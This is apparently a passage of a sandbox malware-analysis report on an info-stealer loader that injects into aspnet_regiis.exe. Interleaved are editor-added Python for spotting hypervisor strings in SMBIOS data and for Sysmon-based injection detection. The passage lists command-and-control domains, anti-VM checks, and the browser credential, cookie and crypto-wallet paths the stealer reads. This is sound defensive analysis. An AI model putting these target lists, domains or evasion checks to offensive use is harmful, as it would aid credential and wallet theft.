Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.6.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.6.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.6.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr | Binary or memory string: vmci.syshbin`
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.6.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Amcache.hve.6.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.6.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | API call chain: ExitProcess graph end node graph_3-14378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0279CCA0 LdrInitializeThunk, 3_2_0279CCA0
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_6CEF3C6A IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, 0_2_6CEF3C6A
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_6CEF3C39 mov eax, dword ptr fs:[00000030h] (PEB read) 0_2_6CEF3C39
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_6CEF2A65 mov eax, dword ptr fs:[00000030h] (PEB read) 0_2_6CEF2A65
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_6CEF584C GetProcessHeap, 0_2_6CEF584C
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_6CEF3C6A IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, 0_2_6CEF3C6A
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_6CEF12DA IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, 0_2_6CEF12DA
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_6CEF0E01 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, 0_2_6CEF0E01
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory allocated: page read and write | page guard
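The FirmwareTableInformation query above is the NtQuerySystemInformation class behind GetSystemFirmwareTable('RSMB'), and the Win32_BIOS WMI query reads the same SMBIOS data through WMI. On this analysis VM that table still carries the "VMware, Inc." and "VMware20,1" strings the Amcache entries list, which is exactly what the stealer looks for before it decides to run. The following is an added example by the editor, not code from the report or from the sample: it walks a RawSMBIOSData buffer in the layout GetSystemFirmwareTable returns and lists every string field that names a hypervisor, so a sandbox image can be checked before detonation. The table bytes are constructed to mirror the BiosVendor and SystemProduct values in this report (not dumped from the VM), and the indicator list and field map are the editor's assumptions.

```python
"""Added example: what the 'FirmwareTableInformation' query (the
NtQuerySystemInformation class behind GetSystemFirmwareTable('RSMB'))
hands a stealer, and a check for the VM strings this report shows.
Editor's code, not part of the report or the sample.

Assumptions: the buffer has the Windows RawSMBIOSData layout (8-byte
header, then the raw SMBIOS table); the table bytes are constructed here
to mirror the BiosVendor / SystemProduct values in the report's Amcache
entries, not dumped from the analysis VM; VM_INDICATORS and STRING_FIELDS
are the editor's choices.
"""
import struct

VM_INDICATORS = ("vmware", "virtualbox", "vbox", "qemu", "hyper-v", "xen", "kvm", "parallels")

# SMBIOS formatted-area offsets that hold string indexes, per structure type
STRING_FIELDS = {
    0: {0x04: "BiosVendor", 0x05: "BiosVersion", 0x08: "BiosReleaseDate"},
    1: {0x04: "SystemManufacturer", 0x05: "SystemProduct",
        0x06: "SystemVersion", 0x07: "SystemSerial"},
    2: {0x04: "BaseboardManufacturer", 0x05: "BaseboardProduct"},
}


def build_structure(stype, handle, formatted, strings):
    """One SMBIOS structure: 4-byte header, formatted area, NUL-terminated strings, extra NUL."""
    header = struct.pack("<BBH", stype, 4 + len(formatted), handle)
    string_set = b"".join(s.encode() + b"\x00" for s in strings) or b"\x00"
    return header + formatted + string_set + b"\x00"


def parse_raw_smbios(buf):
    """Walk a RawSMBIOSData buffer; return [(type, handle, {field: string})]."""
    _used20, _major, _minor, _dmi, length = struct.unpack_from("<BBBBI", buf, 0)
    table = buf[8:8 + length]
    structures, pos = [], 0
    while pos + 4 <= len(table):
        stype, slen, handle = struct.unpack_from("<BBH", table, pos)
        if slen < 4:
            break
        formatted = table[pos:pos + slen]
        strings, p = [], pos + slen
        while p < len(table):            # string-set ends with an empty string
            end = table.find(b"\x00", p)
            if end == -1:
                p = len(table)
                break
            if end == p:
                p += 1
                break
            strings.append(table[p:end].decode("latin-1"))
            p = end + 1
        fields = {}
        for off, name in STRING_FIELDS.get(stype, {}).items():
            idx = formatted[off] if off < slen else 0   # 0 means "no string"
            fields[name] = strings[idx - 1] if 0 < idx <= len(strings) else ""
        structures.append((stype, handle, fields))
        if stype == 127:                 # end-of-table structure
            break
        pos = p
    return structures


def vm_indicators(buf):
    """[(field, value, indicator)] for every string field that names a hypervisor."""
    hits = []
    for _stype, _handle, fields in parse_raw_smbios(buf):
        for name, value in fields.items():
            low = value.lower()
            hit = next((ind for ind in VM_INDICATORS if ind in low), None)
            if hit:
                hits.append((name, value, hit))
    return hits


def sample_vmware_rsmb():
    """Constructed RawSMBIOSData carrying the same vendor/product strings as the report."""
    bios = build_structure(0, 0x0000, bytes([1, 2, 0x00, 0xE0, 3, 0xFF]) + bytes(8),
                           ["VMware, Inc.", "VMW201.00V.20829224.B64.2211211842", "11/21/2022"])
    system = build_structure(1, 0x0001, bytes([1, 2, 3, 4]) + bytes(16) + bytes([6, 0, 0]),
                             ["VMware, Inc.", "VMware20,1", "None",
                              "VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0"])
    end = build_structure(127, 0xFEFF, b"", [])
    table = bios + system + end
    return struct.pack("<BBBBI", 0, 3, 2, 0, len(table)) + table


if __name__ == "__main__":
    for field, value, ind in vm_indicators(sample_vmware_rsmb()):
        print(f"{field:<20} {value!r:<60} leaks {ind}")
```

On a real host, feed `vm_indicators` the bytes from `GetSystemFirmwareTable(b'RSMB', 0, ...)` (via ctypes) and compare against what `Get-CimInstance Win32_BIOS` shows; the sample only reads the strings, so a hardened image must change the table contents, not just the WMI view. The type 1 serial field is included because this report's Amcache also leaks a "VMware-56 4d ..." serial.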

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2760000 protect: page execute and read and write
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2760000 value starts with: 4D5A
Source: R3nz_Loader.exe | String found in binary or memory: rabidcowse.shop
Source: R3nz_Loader.exe | String found in binary or memory: cloudewahsj.shop
Source: R3nz_Loader.exe | String found in binary or memory: tirepublicerj.shop
Source: R3nz_Loader.exe | String found in binary or memory: noisycuttej.shop
Source: R3nz_Loader.exe | String found in binary or memory: wholersorie.shop
Source: R3nz_Loader.exe | String found in binary or memory: framekgirus.shop
Source: R3nz_Loader.exe | String found in binary or memory: nearycrepso.shop
Source: R3nz_Loader.exe | String found in binary or memory: abruptyopsn.shop
Source: R3nz_Loader.exe | String found in binary or memory: fancywaxxers.shop
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2760000
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2761000
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27A1000
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27A4000
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27B2000
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2761000
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27A1000
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27A4000
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27B2000
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2517008
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_6CEF14A8 cpuid 0_2_6CEF14A8
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Queries volume information: C:\Users\user\Desktop\R3nz_Loader.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_6CEF0F23 GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, 0_2_6CEF0F23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.6.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: aspnet_regiis.exe, 00000003.00000002.3271368717.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2100987956.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2141165577.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2740576821.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2101077815.0000000002B1D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2741053262.0000000002AAA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr | Binary or memory string: MsMpEng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
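The entries for base 2760000 above (an execute+read+write allocation inside aspnet_regiis.exe, followed by a write whose first bytes are 4D5A, the MZ signature) together with the argument-less Process created entry are the chain a detection should key on: the loader spawns a signed .NET utility that does nothing useful without a switch, then maps a PE into it. The following is an added example by the editor, not a rule from Joe Sandbox or any vendor. It applies two checks to Sysmon-style events (Event ID 1 ProcessCreate and Event ID 10 ProcessAccess, with Sysmon's field names) and correlates them on the child process GUID. The sample events are constructed from the report's process tree with made-up GUIDs and a made-up GrantedAccess value; the trusted-parent prefixes and the no-arguments heuristic are assumptions to tune locally.

```python
"""Added example: detection logic for the injection chain in this report
(R3nz_Loader.exe spawns aspnet_regiis.exe with no arguments, then gets a
handle with write rights and maps a PE into it). Editor's code, not a
vendor or Joe Sandbox rule.

Assumptions: events are Sysmon Event ID 1 (ProcessCreate) and 10
(ProcessAccess) parsed into dicts keyed by Sysmon's field names; sample
events are constructed from the report's process tree with made-up
ProcessGuid and GrantedAccess values; TRUSTED_PARENT_PREFIXES and the
'no arguments' heuristic are local tuning choices.
"""

# Access rights VirtualAllocEx / WriteProcessMemory need on the target handle
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_VM_OPERATION | PROCESS_VM_WRITE

TARGET = "aspnet_regiis.exe"
# Assumption: paths from which aspnet_regiis.exe is legitimately launched in this estate
TRUSTED_PARENT_PREFIXES = (
    "c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
    "c:\\program files\\", "c:\\program files (x86)\\",
)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def has_arguments(cmdline):
    """True when the command line carries anything after the (possibly quoted) image path."""
    rest = cmdline.strip()
    if rest.startswith('"'):
        closing = rest.find('"', 1)
        rest = rest[closing + 1:] if closing != -1 else ""
    else:
        rest = rest.split(" ", 1)[1] if " " in rest else ""
    return rest.strip() != ""


def check_process_create(ev):
    """Rule 1: aspnet_regiis.exe started argument-less by an untrusted parent.
    The tool only does work with a switch (-i, -iru, -pe ...); the report shows none."""
    if ev.get("EventID") != 1 or basename(ev["Image"]) != TARGET:
        return None
    if ev["ParentImage"].lower().startswith(TRUSTED_PARENT_PREFIXES):
        return None
    if has_arguments(ev["CommandLine"]):
        return None
    return {"rule": "aspnet_regiis_spawned_without_args",
            "parent": ev["ParentImage"], "child_guid": ev["ProcessGuid"]}


def check_process_access(ev):
    """Rule 2: another process opens aspnet_regiis.exe with VM_OPERATION|VM_WRITE,
    the rights behind the 'Memory allocated' / 'Memory written' entries above."""
    if ev.get("EventID") != 10 or basename(ev["TargetImage"]) != TARGET:
        return None
    if basename(ev["SourceImage"]) == TARGET:
        return None  # self-access by the CLR is routine
    granted = int(ev["GrantedAccess"], 16)
    if (granted & INJECT_MASK) != INJECT_MASK:
        return None
    return {"rule": "aspnet_regiis_memory_write_access", "source": ev["SourceImage"],
            "granted": hex(granted), "target_guid": ev["TargetProcessGuid"]}


def detect(events):
    """Run both rules and mark rule-2 hits whose target is a rule-1 child."""
    alerts = []
    for ev in events:
        for hit in (check_process_create(ev), check_process_access(ev)):
            if hit:
                alerts.append(hit)
    spawned = {a["child_guid"] for a in alerts if "child_guid" in a}
    for a in alerts:
        if "target_guid" in a:
            a["correlated"] = a["target_guid"] in spawned
    return alerts


ASPNET = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
LOADER = r"C:\Users\user\Desktop\R3nz_Loader.exe"
# Constructed events: paths from the report, GUIDs and GrantedAccess made up
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": ASPNET, "CommandLine": f'"{ASPNET}"',
     "ParentImage": LOADER, "ProcessGuid": "{guid-child-1}"},
    {"EventID": 10, "SourceImage": LOADER, "TargetImage": ASPNET,
     "GrantedAccess": "0x1FFFFF", "TargetProcessGuid": "{guid-child-1}"},
    # benign: invoked with a switch from a trusted path
    {"EventID": 1, "Image": ASPNET, "CommandLine": f'"{ASPNET}" -iru',
     "ParentImage": r"C:\Windows\System32\cmd.exe", "ProcessGuid": "{guid-child-2}"},
    # benign: query-only handle from a system process
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": ASPNET,
     "GrantedAccess": "0x1000", "TargetProcessGuid": "{guid-child-2}"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Sysmon does not log VirtualAllocEx or WriteProcessMemory themselves; Event ID 10 records the handle open, so the rights mask is the only trace of the write. The report also shows the loader is the parent: if it reuses the handle CreateProcess already returned instead of calling OpenProcess, the ProcessAccess event may never appear, which is why rule 1 has to stand on its own.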

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 5780, type: MEMORYSTR
                          Source: Yara matchFile source: 3.2.aspnet_regiis.exe.2760000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.R3nz_Loader.exe.6cf01000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.R3nz_Loader.exe.6cf01000.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.R3nz_Loader.exe.6cee0000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.R3nz_Loader.exe.a10000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Source: aspnet_regiis.exe, 00000003.00000002.3271368717.0000000002AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                          Source: aspnet_regiis.exe, 00000003.00000002.3271300259.0000000002A9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                          Source: aspnet_regiis.exe, 00000003.00000003.2085718516.0000000002B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                          Source: aspnet_regiis.exe, 00000003.00000002.3271368717.0000000002AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                          Source: aspnet_regiis.exe, 00000003.00000003.2082382204.0000000002AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                          Source: aspnet_regiis.exe, 00000003.00000003.2085741013.0000000002AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                          Source: aspnet_regiis.exe, 00000003.00000002.3271368717.0000000002AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                          Source: aspnet_regiis.exe, 00000003.00000003.2085718516.0000000002B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                          Source: aspnet_regiis.exe, 00000003.00000003.2085741013.0000000002AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
